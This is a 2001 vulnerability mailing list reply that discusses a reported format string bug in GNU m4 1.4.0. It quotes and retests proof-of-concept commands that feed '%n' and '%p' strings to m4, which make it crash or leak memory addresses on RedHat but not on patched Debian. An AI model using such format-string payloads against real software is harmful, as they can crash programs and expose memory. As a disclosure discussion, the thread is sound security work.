Vulnerability Development mailing list archives
Re: [Helios Security and Administration::another bug in m4]
From: Colin Phipps <cph () NETCRAFT COM>
Date: Fri, 23 Feb 2001 11:09:48 +0000
On Thu, Feb 22, 2001 at 06:12:18PM +0100, honoriak wrote:
[Helios Security and Administration] - Program: m4-1.4.0
It would be better to say "GNU m4", there are other implementations around.
- Vulnerability: format string bug - Details: Another format string buf in m4 1.4.0. This time is with -d option, another exists in -G option. - Risk: Low (Nothing). It's not setuid. It's useless but it's a vulnerability of course.
Debatable. If you're allowing untrusted users to specify parameters to an interpreter like m4, you're already in trouble.
- Example: $ m4 -d "`perl -e 'print " %n"x3'`" m4: Segmentation fault (core dumped)
The space after the -d means you aren't supplying arguments to the -d option, m4 is interpreting the argument as a filename. On a RedHat 6.2 box: % rpm -q m4 m4-1.4-12 % m4 -d"`perl -e 'print " %n"x4'`" m4: bad debug flags: ` %n %n %n' % m4 -d "`perl -e 'print " %n"x3'`" m4: zsh: segmentation fault m4 -d %n %n %n % m4 -d "`perl -e 'print " %p"x4'`" m4: 0x4010b1cc 0x4000aea0 0xbffffd64 0xbffffd38: No such file or directory On Debian with the latest updates, the bug is fixed: % cat /etc/debian_version testing/unstable % m4 --version GNU m4 1.4 % dpkg -l m4 ii m4 1.4-12 a macro processing language % m4 -d "`perl -e 'print " %n"x3'`" m4: %n %n %n: No such file or directory % m4 -d"`perl -e 'print " %n"x3'`" m4: bad debug flags: ` %n %n %n'
$ m4 -G "`perl -e 'print " %p"x4'`" m4: 0x4010848c 0x4000a610 0xbffffc14 0xbffffbe8: No such file or directory
-G doesn't take a parameter in GNU m4, it's an alias for --traditional. You're just seeing a bug in the filename handling again. Current Debian again not affected: nausea% m4 -G "`perl -e 'print " %p"x4'`" m4: %p %p %p %p: No such file or directory -- Colin Phipps http://www.netcraft.com/
Current thread:
- [Helios Security and Administration::another bug in m4] honoriak (Feb 22)
- Re: [Helios Security and Administration::another bug in m4] Knud Erik Hojgaard - CyberCity Support (Feb 23)
- Re: [Helios Security and Administration::another bug in m4] Colin Phipps (Feb 23)